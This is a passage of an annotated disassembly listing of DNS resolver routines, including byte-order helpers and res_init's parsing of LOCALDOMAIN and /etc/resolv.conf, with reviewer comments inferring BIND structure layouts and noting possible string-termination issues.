arg_0 = dword ptr 8 push ebp mov ebp, esp mov edx, [ebp+arg_0] test dl, dl jl short loc_804D47C mov eax, dword_8078FA0 test byte ptr [eax+edx*2+1], 1 jz short loc_804D47C mov eax, dword_8078FA4 mov eax, [eax+edx*4] mov esp, ebp pop ebp retn ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 db 8Dh, 36h ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_804D47C: ; CODE XREF: sub_804D458+8j ; sub_804D458+14j mov eax, edx mov esp, ebp pop ebp retn sub_804D458 endp ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 db 8Dh, 36h ; 栩栩栩栩栩栩栩 S U B R O U T I N E 栩栩栩栩栩栩栩栩栩栩栩栩栩栩栩栩栩栩栩 ; Attributes: bp-based frame hidden sub_804D484 proc near ; CODE XREF: sub_804D2A0+8Ep var_30 = byte ptr -30h var_24 = dword ptr -24h var_20 = dword ptr -20h var_1C = dword ptr -1Ch var_18 = dword ptr -18h var_14 = dword ptr -14h var_10 = dword ptr -10h var_C = dword ptr -0Ch var_8 = dword ptr -8 var_4 = dword ptr -4 arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch arg_8 = dword ptr 10h arg_C = dword ptr 14h push ebp mov ebp, esp sub esp, 24h push edi push esi push ebx mov ecx, [ebp+arg_8] mov [ebp+var_4], ecx jmp loc_804D69C ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_804D498: ; CODE XREF: sub_804D484+21Ej mov ebx, [ebp+arg_0] mov ecx, [ebp+var_4] mov ecx, [ecx] mov [ebp+var_8], ecx movzx esi, byte ptr [ecx] mov edi, ecx jmp loc_804D681 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 db 8Dh, 76h, 0 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_804D4B0: ; CODE XREF: sub_804D484+200j mov eax, esi and eax, 0C0h jz short loc_804D4CC cmp eax, 0C0h jz loc_804D66C jmp loc_804D6A8 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 db 8Dh, 76h, 0 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_804D4CC: ; CODE XREF: sub_804D484+33j dec esi js loc_804D656 mov eax, esi not eax and eax, 3 cmp esi, 0FFFFFFFFh jle short loc_804D557 test eax, eax jz loc_804D590 cmp eax, 3 jge short loc_804D557 cmp eax, 2 jge short loc_804D524 cmp byte ptr [ebx], 2Eh jz loc_804D698 cmp byte ptr [ebx], 5Ch jnz short loc_804D500 inc ebx loc_804D500: ; CODE XREF: sub_804D484+79j movzx eax, 
byte ptr [ebx] push eax inc ebx call sub_804D458 mov [ebp+var_C], eax movzx eax, byte ptr [edi] push eax inc edi call sub_804D458 add esp, 8 cmp [ebp+var_C], eax jnz loc_804D698 dec esi loc_804D524: ; CODE XREF: sub_804D484+6Bj cmp byte ptr [ebx], 2Eh jz loc_804D698 cmp byte ptr [ebx], 5Ch jnz short loc_804D533 inc ebx loc_804D533: ; CODE XREF: sub_804D484+ACj movzx eax, byte ptr [ebx] push eax inc ebx call sub_804D458 mov [ebp+var_10], eax movzx eax, byte ptr [edi] push eax inc edi call sub_804D458 add esp, 8 cmp [ebp+var_10], eax jnz loc_804D698 dec esi loc_804D557: ; CODE XREF: sub_804D484+59j ; sub_804D484+66j cmp byte ptr [ebx], 2Eh jz loc_804D698 cmp byte ptr [ebx], 5Ch jnz short loc_804D566 inc ebx loc_804D566: ; CODE XREF: sub_804D484+DFj movzx eax, byte ptr [ebx] push eax inc ebx call sub_804D458 mov [ebp+var_14], eax movzx eax, byte ptr [edi] push eax inc edi call sub_804D458 add esp, 8 cmp [ebp+var_14], eax jnz loc_804D698 dec esi js loc_804D656 loc_804D590: ; CODE XREF: sub_804D484+5Dj ; sub_804D484+1CCj cmp byte ptr [ebx], 2Eh jz loc_804D698 cmp byte ptr [ebx], 5Ch jnz short loc_804D59F inc ebx loc_804D59F: ; CODE XREF: sub_804D484+118j movzx eax, byte ptr [ebx] push eax inc ebx call sub_804D458 mov [ebp+var_18], eax movzx eax, byte ptr [edi] push eax inc edi call sub_804D458 add esp, 8 cmp [ebp+var_18], eax jnz loc_804D698 dec esi cmp byte ptr [ebx], 2Eh jz loc_804D698 cmp byte ptr [ebx], 5Ch jnz short loc_804D5D2 inc ebx loc_804D5D2: ; CODE XREF: sub_804D484+14Bj movzx eax, byte ptr [ebx] push eax inc ebx call sub_804D458 mov [ebp+var_1C], eax movzx eax, byte ptr [edi] push eax inc edi call sub_804D458 add esp, 8 cmp [ebp+var_1C], eax jnz loc_804D698 dec esi cmp byte ptr [ebx], 2Eh jz loc_804D698 cmp byte ptr [ebx], 5Ch jnz short loc_804D605 inc ebx loc_804D605: ; CODE XREF: sub_804D484+17Ej movzx eax, byte ptr [ebx] push eax inc ebx call sub_804D458 mov [ebp+var_20], eax movzx eax, byte ptr [edi] push eax inc edi call sub_804D458 add esp, 8 cmp 
[ebp+var_20], eax jnz short loc_804D698 dec esi cmp byte ptr [ebx], 2Eh jz short loc_804D698 cmp byte ptr [ebx], 5Ch jnz short loc_804D630 inc ebx loc_804D630: ; CODE XREF: sub_804D484+1A9j movzx eax, byte ptr [ebx] push eax inc ebx call sub_804D458 mov [ebp+var_24], eax movzx eax, byte ptr [edi] push eax inc edi call sub_804D458 add esp, 8 cmp [ebp+var_24], eax jnz short loc_804D698 dec esi jns loc_804D590 loc_804D656: ; CODE XREF: sub_804D484+49j ; sub_804D484+106j movzx esi, byte ptr [ebx] inc ebx test esi, esi jnz short loc_804D663 cmp byte ptr [edi], 0 jz short loc_804D68F loc_804D663: ; CODE XREF: sub_804D484+1D8j cmp esi, 2Eh jz short loc_804D67E jmp short loc_804D698 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 db 8Dh, 36h ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_804D66C: ; CODE XREF: sub_804D484+3Aj mov eax, esi and eax, 3Fh shl eax, 8 movzx edx, byte ptr [edi] or eax, edx mov edi, [ebp+arg_4] add edi, eax loc_804D67E: ; CODE XREF: sub_804D484+1E2j movzx esi, byte ptr [edi] loc_804D681: ; CODE XREF: sub_804D484+24j inc edi test esi, esi jnz loc_804D4B0 cmp byte ptr [ebx], 0 jnz short loc_804D698 loc_804D68F: ; CODE XREF: sub_804D484+1DDj mov eax, [ebp+var_8] sub eax, [ebp+arg_4] jmp short loc_804D6AD ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 align 4 loc_804D698: ; CODE XREF: sub_804D484+70j ; sub_804D484+99j ... add [ebp+var_4], 4 loc_804D69C: ; CODE XREF: sub_804D484+Fj mov ecx, [ebp+arg_C] cmp [ebp+var_4], ecx jb loc_804D498 loc_804D6A8: ; CODE XREF: sub_804D484+40j mov eax, 0FFFFFFFFh loc_804D6AD: ; CODE XREF: sub_804D484+211j lea esp, [ebp+var_30] pop ebx pop esi pop edi mov esp, ebp pop ebp retn sub_804D484 endp ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 align 4 ; 栩栩栩栩栩栩栩 S U B R O U T I N E 栩栩栩栩栩栩栩栩栩栩栩栩栩栩栩栩栩栩栩 ; Attributes: bp-based frame hidden sub_804D6B8 proc near ; CODE XREF: getanswer+19Fp ; getanswer+1ADp ... 
; Body of sub_804D6B8 (its "proc near" line precedes this span).
; Reads two bytes at arg_0 and returns them as a zero-extended 16-bit value,
; first byte most significant (big-endian / network order).
; The routine takes no length argument, so the caller must guarantee that two
; bytes are readable at arg_0.
; NOTE(review): presumably _getshort from the BIND resolver; the XREFs from
; getanswer point the same way -- confirm.
arg_0 = dword ptr 8
        push ebp
        mov ebp, esp
        mov eax, [ebp+arg_0]
        mov dl, [eax]                   ; high byte
        shl dx, 8
        movzx ax, byte ptr [eax+1]      ; low byte
        or dx, ax
        movzx eax, dx
        mov esp, ebp
        pop ebp
        retn
sub_804D6B8 endp
; ---------------------------------------------------------------------------
        align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame hidden
; sub_804D6D4: reads four bytes at arg_0 and returns them as a 32-bit value,
; first byte most significant. No bounds are checked here; the caller owns
; the "four bytes available" guarantee.
; NOTE(review): presumably _getlong from the BIND resolver -- confirm.
sub_804D6D4 proc near                   ; CODE XREF: sub_805F7E4+66p
                                        ; sub_805F7E4+41Dp ...
arg_0 = dword ptr 8
        push ebp
        mov ebp, esp
        mov edx, [ebp+arg_0]
        mov cl, [edx]
        shl ecx, 18h                    ; byte 0 -> bits 31..24 (stale upper bits shift out)
        movzx eax, byte ptr [edx+1]
        shl eax, 10h                    ; byte 1 -> bits 23..16
        or ecx, eax
        movzx eax, byte ptr [edx+2]
        shl eax, 8                      ; byte 2 -> bits 15..8
        or ecx, eax
        movzx eax, byte ptr [edx+3]     ; byte 3 -> bits 7..0
        or ecx, eax
        mov eax, ecx
        mov esp, ebp
        pop ebp
        retn
sub_804D6D4 endp
; ---------------------------------------------------------------------------
        db 8Dh, 76h, 0
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame hidden
; sub_804D700: stores the 16-bit value arg_0 at the address arg_4, most
; significant byte first. Writes exactly two bytes and returns nothing useful.
; NOTE(review): presumably __putshort from the BIND resolver -- confirm.
sub_804D700 proc near                   ; CODE XREF: sub_804EA0C+283p
                                        ; sub_80608C8+113p ...
arg_0 = word ptr 8
arg_4 = dword ptr 0Ch
        push ebp
        mov ebp, esp
        mov ecx, [ebp+arg_4]            ; destination
        mov dx, [ebp+arg_0]             ; value
        mov eax, edx
        shr ax, 8
        mov [ecx], al                   ; high byte first
        mov [ecx+1], dl                 ; then low byte
        mov esp, ebp
        pop ebp
        retn
sub_804D700 endp
; ---------------------------------------------------------------------------
        db 8Dh, 76h, 0
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame hidden
; sub_804D71C: stores the 32-bit value arg_0 at the address arg_4, most
; significant byte first. Writes exactly four bytes.
; NOTE(review): presumably __putlong from the BIND resolver -- confirm.
sub_804D71C proc near                   ; CODE XREF: sub_80608C8+188p
                                        ; sub_80608C8+1D9p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
        push ebp
        mov ebp, esp
        mov ecx, [ebp+arg_0]            ; value
        mov edx, [ebp+arg_4]            ; destination
        mov eax, ecx
        shr eax, 18h
        mov [edx], al                   ; bits 31..24
        mov eax, ecx
        shr eax, 10h
        mov [edx+1], al                 ; bits 23..16
        mov eax, ecx
        shr eax, 8
        mov [edx+2], al                 ; bits 15..8
        mov [edx+3], cl                 ; bits 7..0
        mov esp, ebp
        pop ebp
        retn
sub_804D71C endp
; ---------------------------------------------------------------------------
        align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame hidden
res_init proc near                      ; CODE XREF: init_services_resolv+209p
                                        ; init_services_resolv+ACFp ...
; First part of res_init (its "proc near" line precedes this span): resolver
; state defaults, the LOCALDOMAIN environment override, and the start of the
; /etc/resolv.conf line loop ("domain" keyword).
;
; Inputs that reach this code from outside the process: the LOCALDOMAIN
; environment variable (fetched through secure_getenv) and the contents of
; /etc/resolv.conf. Both are copied into the fixed global byte_80785A4.
;
; NOTE(review): the global layout matches BIND's struct __res_state
; (retrans, retry, options, nscount, nsaddr_list, id, dnsrch, defdname) --
; field names used in the comments below are that inference; confirm.
var_430 = byte ptr -430h
var_424 = dword ptr -424h
var_420 = dword ptr -420h
var_41C = dword ptr -41Ch
var_418 = dword ptr -418h
var_414 = dword ptr -414h
var_410 = dword ptr -410h
var_40C = dword ptr -40Ch
var_408 = dword ptr -408h
var_404 = dword ptr -404h
var_400 = byte ptr -400h
var_3FA = byte ptr -3FAh
var_3F9 = byte ptr -3F9h
var_3F8 = byte ptr -3F8h
var_3F6 = byte ptr -3F6h
        push ebp
        mov ebp, esp
        sub esp, 424h
        push edi
        push esi
        push ebx
        mov [ebp+var_410], 0            ; count of "nameserver" lines accepted
        mov [ebp+var_414], 0            ; set once LOCALDOMAIN supplied the domain
        mov [ebp+var_418], 0            ; set once a search list has been built
        mov [ebp+var_41C], 0            ; count of "sortlist" entries
        cmp dword_8078544, 0
        jnz short loc_804D78B
        mov dword_8078544, 5            ; default only if still zero (presumably retrans)
loc_804D78B:                            ; CODE XREF: res_init+3Bj
        cmp dword_8078548, 0
        jnz short loc_804D79E
        mov dword_8078548, 4            ; default only if still zero (presumably retry)
loc_804D79E:                            ; CODE XREF: res_init+4Ej
        test byte ptr dword_807854C, 1  ; bit 0 = "already initialised" (set at the end of res_init)
        jnz short loc_804D7B1
        mov dword_807854C, 2C0h         ; default option bits; presumably RES_DEFAULT
loc_804D7B1:                            ; CODE XREF: res_init+61j
        cmp word_8078584, 0
        jnz short loc_804D7C6
        call res_randomid               ; seed the 16-bit id only when it is still zero
        mov word_8078584, ax
loc_804D7C6:                            ; CODE XREF: res_init+75j
        mov dword_8078558, 0            ; first server address = 0.0.0.0
        mov word ptr dword_8078554, 2   ; family 2 (AF_INET)
        mov word ptr dword_8078554+2, 3500h ; stored bytes 00 35 = port 53 in network order
        mov dword_8078550, 1            ; one server configured by default
        and byte_80786A8, 0F0h
        or byte_80786A8, 1              ; low nibble = 1 (the "ndots" threshold read by res_search)
        mov dword_80786A4, 0
        push offset aLocaldomain        ; "LOCALDOMAIN"
        call secure_getenv
        mov ebx, eax
        add esp, 4
        test ebx, ebx
        jz loc_804D8B4                  ; variable absent: go straight to the config file
        ; Environment value is copied with a 255-byte cap. strncpy leaves the
        ; destination unterminated when the source is 255 bytes or longer;
        ; whether byte_80785A4 has a spare, pre-zeroed byte after offset 254
        ; is not visible here -- TODO confirm the size of byte_80785A4.
        push 0FFh
        push ebx
        push offset byte_80785A4
        call strncpy
        inc [ebp+var_414]               ; remember that the environment won
        mov ebx, offset byte_80785A4
        mov dword_8078588, offset byte_80785A4 ; search list entry 0 = the copied string
        mov edx, offset dword_807858C   ; edx = next free search-list slot
        xor esi, esi                    ; esi = "previous character was a separator"
        add esp, 0Ch
        cmp byte_80785A4, 0
        jz short loc_804D8AB
        nop
        ; Split the copied string in place on space/tab; each following word
        ; becomes another search-list pointer. The slot pointer is bounded by
        ; unk_80785A0, and a newline stops the scan.
loc_804D854:                            ; CODE XREF: res_init+14Dj
        cmp edx, offset unk_80785A0
        jnb short loc_804D8A1           ; pointer table full
        cmp byte ptr [ebx], 0Ah
        jz short loc_804D8A1            ; newline ends the list
        cmp byte ptr [ebx], 20h
        jz short loc_804D86B
        cmp byte ptr [ebx], 9
        jnz short loc_804D878
loc_804D86B:                            ; CODE XREF: res_init+120j
        mov byte ptr [ebx], 0           ; separator -> terminate the previous word
        mov esi, 1
        jmp short loc_804D88D
; ---------------------------------------------------------------------------
        db 8Dh, 76h, 0
; ---------------------------------------------------------------------------
loc_804D878:                            ; CODE XREF: res_init+125j
        test esi, esi
        jz short loc_804D88D
        mov [edx], ebx                  ; first character after a separator: record the word
        add edx, 4
        xor esi, esi
        mov [ebp+var_418], 1
loc_804D88D:                            ; CODE XREF: res_init+12Fj
                                        ; res_init+136j
        inc ebx
        cmp byte ptr [ebx], 0
        jnz short loc_804D854
        jmp short loc_804D8A1
; ---------------------------------------------------------------------------
        db 8Dh, 76h, 0
; ---------------------------------------------------------------------------
loc_804D898:                            ; CODE XREF: res_init+165j
        mov al, [ebx]
        add al, 0F7h                    ; al - 9
        cmp al, 1
        jbe short loc_804D8AB           ; tab (9) or newline (0Ah) ends the last word
        inc ebx
loc_804D8A1:                            ; CODE XREF: res_init+116j
                                        ; res_init+11Bj ...
        cmp byte ptr [ebx], 0
        jz short loc_804D8AB
        cmp byte ptr [ebx], 20h
        jnz short loc_804D898
loc_804D8AB:                            ; CODE XREF: res_init+10Dj
                                        ; res_init+15Aj ...
        mov byte ptr [ebx], 0           ; terminate the last word
        mov dword ptr [edx], 0          ; NULL-terminate the pointer list
loc_804D8B4:                            ; CODE XREF: res_init+D1j
        push offset aR_0                ; "r"
        push offset aEtcResolv_conf     ; "/etc/resolv.conf"
        call fopen
        mov [ebp+var_40C], eax          ; FILE * kept for fgets (closed later in res_init)
        add esp, 8
        test eax, eax
        jz loc_804DDD2                  ; no config file: skip the line loop
        lea ecx, [ebp+var_400]
        mov [ebp+var_424], ecx          ; line buffer = 400h bytes on the stack
        ; Line loop: fgets is given the full 400h buffer size, so a line
        ; cannot overrun var_400.
loc_804D8E0:                            ; CODE XREF: res_init+1C6j
                                        ; res_init+1CFj ...
        mov ecx, [ebp+var_40C]
        push ecx
        push 400h
        mov ecx, [ebp+var_424]
        push ecx
        call fgets
        add esp, 0Ch
        test eax, eax
        jz loc_804DD98                  ; EOF or read error
        cmp [ebp+var_400], 3Bh
        jz short loc_804D8E0            ; ';' comment line
        cmp [ebp+var_400], 23h
        jz short loc_804D8E0            ; '#' comment line
        push 6
        push offset aDomain             ; "domain"
        mov ecx, [ebp+var_424]
        push ecx
        call strncmp
        add esp, 0Ch
        test eax, eax
        jnz loc_804D9C0                 ; not "domain": try the next keyword
        cmp [ebp+var_3FA], 20h          ; var_3FA = line[6]; keyword must be followed by
        jz short loc_804D945            ; a space ...
        cmp [ebp+var_3FA], 9            ; ... or a tab
        jnz short loc_804D9C0
loc_804D945:                            ; CODE XREF: res_init+1F6j
        cmp [ebp+var_414], 0
        jnz short loc_804D8E0           ; LOCALDOMAIN already set the domain: ignore this line
        lea ebx, [ebp+var_3FA]
        cmp [ebp+var_3FA], 20h
        jz short loc_804D968
        cmp [ebp+var_3FA], 9
        jnz short loc_804D973
        lea esi, [esi]
loc_804D968:                            ; CODE XREF: res_init+217j
                                        ; res_init+228j ...
inc ebx cmp byte ptr [ebx], 20h jz short loc_804D968 cmp byte ptr [ebx], 9 jz short loc_804D968 loc_804D973: ; CODE XREF: res_init+220j cmp byte ptr [ebx], 0 jz loc_804D8E0 cmp byte ptr [ebx], 0Ah jz loc_804D8E0 push 0FFh push ebx push offset byte_80785A4 call strncpy push offset asc_8067C27 ; " \t\n" push offset byte_80785A4 call strpbrk mov ebx, eax add esp, 14h test ebx, ebx jz short loc_804D9B0 mov byte ptr [ebx], 0 loc_804D9B0: ; CODE XREF: res_init+267j mov [ebp+var_418], 0 jmp loc_804D8E0 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 align 4 loc_804D9C0: ; CODE XREF: res_init+1E9j ; res_init+1FFj push 6 push offset aSearch ; "search" mov ecx, [ebp+var_424] push ecx call strncmp add esp, 0Ch test eax, eax jnz loc_804DAD8 cmp [ebp+var_3FA], 20h jz short loc_804D9F4 cmp [ebp+var_3FA], 9 jnz loc_804DAD8 loc_804D9F4: ; CODE XREF: res_init+2A1j cmp [ebp+var_414], 0 jnz loc_804D8E0 lea ebx, [ebp+var_3FA] cmp [ebp+var_3FA], 20h jz short loc_804DA1C cmp [ebp+var_3FA], 9 jnz short loc_804DA27 db 8Dh,76h,0 ; lea esi, [esi+0] loc_804DA1C: ; CODE XREF: res_init+2CAj ; res_init+2DCj ... 
inc ebx cmp byte ptr [ebx], 20h jz short loc_804DA1C cmp byte ptr [ebx], 9 jz short loc_804DA1C loc_804DA27: ; CODE XREF: res_init+2D3j cmp byte ptr [ebx], 0 jz loc_804D8E0 cmp byte ptr [ebx], 0Ah jz loc_804D8E0 push 0FFh push ebx push offset byte_80785A4 call strncpy push 0Ah push offset byte_80785A4 call strchr mov ebx, eax add esp, 14h test ebx, ebx jz short loc_804DA61 mov byte ptr [ebx], 0 loc_804DA61: ; CODE XREF: res_init+318j mov ebx, offset byte_80785A4 mov dword_8078588, offset byte_80785A4 mov edx, offset dword_807858C xor esi, esi cmp byte_80785A4, 0 jz short loc_804DAC0 loc_804DA80: ; CODE XREF: res_init+367j cmp edx, offset unk_80785A0 jnb short loc_804DAB6 cmp byte ptr [ebx], 20h jz short loc_804DA92 cmp byte ptr [ebx], 9 jnz short loc_804DA9C loc_804DA92: ; CODE XREF: res_init+347j mov byte ptr [ebx], 0 mov esi, 1 jmp short loc_804DAA7 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_804DA9C: ; CODE XREF: res_init+34Cj test esi, esi jz short loc_804DAA7 mov [edx], ebx add edx, 4 xor esi, esi loc_804DAA7: ; CODE XREF: res_init+356j ; res_init+35Aj inc ebx cmp byte ptr [ebx], 0 jnz short loc_804DA80 jmp short loc_804DAB6 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 align 4 loc_804DAB0: ; CODE XREF: res_init+37Aj cmp byte ptr [ebx], 9 jz short loc_804DAC0 inc ebx loc_804DAB6: ; CODE XREF: res_init+342j ; res_init+369j cmp byte ptr [ebx], 0 jz short loc_804DAC0 cmp byte ptr [ebx], 20h jnz short loc_804DAB0 loc_804DAC0: ; CODE XREF: res_init+33Aj ; res_init+36Fj ... 
mov byte ptr [ebx], 0 mov dword ptr [edx], 0 mov [ebp+var_418], 1 jmp loc_804D8E0 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_804DAD8: ; CODE XREF: res_init+294j ; res_init+2AAj push 0Ah push offset aNameserver ; "nameserver" mov ecx, [ebp+var_424] push ecx call strncmp add esp, 0Ch test eax, eax jnz loc_804DB9C cmp [ebp+var_3F6], 20h jz short loc_804DB0C cmp [ebp+var_3F6], 9 jnz loc_804DB9C loc_804DB0C: ; CODE XREF: res_init+3B9j cmp [ebp+var_410], 2 jg loc_804DB9C lea ebx, [ebp+var_3F6] cmp [ebp+var_3F6], 20h jz short loc_804DB34 cmp [ebp+var_3F6], 9 jnz short loc_804DB3F db 8Dh,76h,0 ; lea esi, [esi+0] loc_804DB34: ; CODE XREF: res_init+3E2j ; res_init+3F4j ... inc ebx cmp byte ptr [ebx], 20h jz short loc_804DB34 cmp byte ptr [ebx], 9 jz short loc_804DB34 loc_804DB3F: ; CODE XREF: res_init+3EBj cmp byte ptr [ebx], 0 jz loc_804D8E0 cmp byte ptr [ebx], 0Ah jz loc_804D8E0 lea eax, [ebp+var_404] push eax push ebx call inet_aton add esp, 8 test eax, eax jz loc_804D8E0 mov edx, [ebp+var_410] shl edx, 4 mov eax, [ebp+var_404] mov dword_8078558[edx], eax mov word ptr dword_8078554[edx], 2 mov word ptr (dword_8078554+2)[edx], 3500h inc [ebp+var_410] jmp loc_804D8E0 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 align 4 loc_804DB9C: ; CODE XREF: res_init+3ACj ; res_init+3C2j ... 
push 8 push offset aSortlist ; "sortlist" mov ecx, [ebp+var_424] push ecx call strncmp add esp, 0Ch test eax, eax jnz loc_804DD48 cmp [ebp+var_3F8], 20h jz short loc_804DBD0 cmp [ebp+var_3F8], 9 jnz loc_804DD48 loc_804DBD0: ; CODE XREF: res_init+47Dj lea ebx, [ebp+var_3F8] cmp [ebp+var_41C], 9 jg loc_804D8E0 mov ecx, [ebp+var_41C] lea edi, ds:0[ecx*8] jmp short loc_804DBF5 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 db 8Dh, 36h ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_804DBF4: ; CODE XREF: res_init+4B4j ; res_init+4B9j inc ebx loc_804DBF5: ; CODE XREF: res_init+4ACj ; res_init+5F9j cmp byte ptr [ebx], 20h jz short loc_804DBF4 cmp byte ptr [ebx], 9 jz short loc_804DBF4 cmp byte ptr [ebx], 0 jz loc_804D8E0 cmp byte ptr [ebx], 0Ah jz loc_804D8E0 cmp byte ptr [ebx], 3Bh jz loc_804D8E0 mov [ebp+var_420], ebx cmp byte ptr [ebx], 0 jz short loc_804DC5C db 8Dh,76h,0 ; lea esi, [esi+0] loc_804DC28: ; CODE XREF: res_init+516j movzx eax, byte ptr [ebx] push eax push offset asc_8067BFE ; "/&" call strchr add esp, 8 test eax, eax jnz short loc_804DC5C cmp byte ptr [ebx], 3Bh jz short loc_804DC5C cmp byte ptr [ebx], 0 jl short loc_804DC5C movzx edx, byte ptr [ebx] mov eax, dword_8078FA0 test byte ptr [eax+edx*2+1], 20h jnz short loc_804DC5C inc ebx cmp byte ptr [ebx], 0 jnz short loc_804DC28 loc_804DC5C: ; CODE XREF: res_init+4DFj ; res_init+4F7j ... 
movzx esi, byte ptr [ebx] mov byte ptr [ebx], 0 lea eax, [ebp+var_408] push eax mov ecx, [ebp+var_420] push ecx call inet_aton add esp, 8 test eax, eax jz loc_804DD32 mov eax, [ebp+var_408] mov dword ptr unk_80786AC[edi], eax push esi push offset asc_8067BFE ; "/&" call strchr add esp, 8 test eax, eax jz short loc_804DD14 mov ecx, esi mov al, cl mov [ebx], al inc ebx mov [ebp+var_420], ebx cmp byte ptr [ebx], 0 jz short loc_804DCE6 cmp byte ptr [ebx], 3Bh jz short loc_804DCE6 cmp byte ptr [ebx], 0 jl short loc_804DCE6 movzx eax, byte ptr [ebx] mov edx, dword_8078FA0 test byte ptr [edx+eax*2+1], 20h jnz short loc_804DCE6 lea esi, [esi] loc_804DCCC: ; CODE XREF: res_init+5A0j inc ebx cmp byte ptr [ebx], 0 jz short loc_804DCE6 cmp byte ptr [ebx], 3Bh jz short loc_804DCE6 cmp byte ptr [ebx], 0 jl short loc_804DCE6 movzx eax, byte ptr [ebx] test byte ptr [edx+eax*2+1], 20h jz short loc_804DCCC loc_804DCE6: ; CODE XREF: res_init+56Aj ; res_init+56Fj ... movzx esi, byte ptr [ebx] mov byte ptr [ebx], 0 lea eax, [ebp+var_408] push eax mov ecx, [ebp+var_420] push ecx call inet_aton add esp, 8 test eax, eax jz short loc_804DD14 mov eax, [ebp+var_408] mov dword ptr unk_80786B0[edi], eax jmp short loc_804DD29 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_804DD14: ; CODE XREF: res_init+558j ; res_init+5C0j mov eax, dword ptr unk_80786AC[edi] push eax call net_mask mov dword ptr unk_80786B0[edi], eax add esp, 4 loc_804DD29: ; CODE XREF: res_init+5CEj add edi, 8 inc [ebp+var_41C] loc_804DD32: ; CODE XREF: res_init+536j mov ecx, esi mov [ebx], cl cmp [ebp+var_41C], 9 jle loc_804DBF5 jmp loc_804D8E0 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_804DD48: ; CODE XREF: res_init+470j ; res_init+486j push 7 push offset aOptions ; "options" mov ecx, [ebp+var_424] push ecx call strncmp add esp, 0Ch test eax, eax jnz loc_804D8E0 cmp [ebp+var_3F9], 20h jz short loc_804DD7C cmp [ebp+var_3F9], 9 jnz loc_804D8E0 loc_804DD7C: ; CODE XREF: res_init+629j push offset aConf ; "conf" lea eax, 
[ebp+var_3F9] push eax call res_setoptions add esp, 8 jmp loc_804D8E0 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 db 8Dh, 76h, 0 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_804DD98: ; CODE XREF: res_init+1B9j cmp [ebp+var_410], 1 jle short loc_804DDAD mov ecx, [ebp+var_410] mov dword_8078550, ecx loc_804DDAD: ; CODE XREF: res_init+65Bj mov al, byte ptr [ebp+var_41C] shl al, 4 and byte_80786A8, 0Fh or byte_80786A8, al mov ecx, [ebp+var_40C] push ecx call fclose add esp, 4 loc_804DDD2: ; CODE XREF: res_init+18Aj cmp byte_80785A4, 0 jnz short loc_804DE15 push 0FFh lea ebx, [ebp+var_400] push ebx call gethostname add esp, 8 test eax, eax jnz short loc_804DE15 push 2Eh push ebx call strchr mov ebx, eax add esp, 8 test ebx, ebx jz short loc_804DE15 lea eax, [ebx+1] push eax push offset byte_80785A4 call strcpy add esp, 8 loc_804DE15: ; CODE XREF: res_init+695j ; res_init+6ADj ... cmp [ebp+var_418], 0 jnz short loc_804DE32 mov dword_8078588, offset 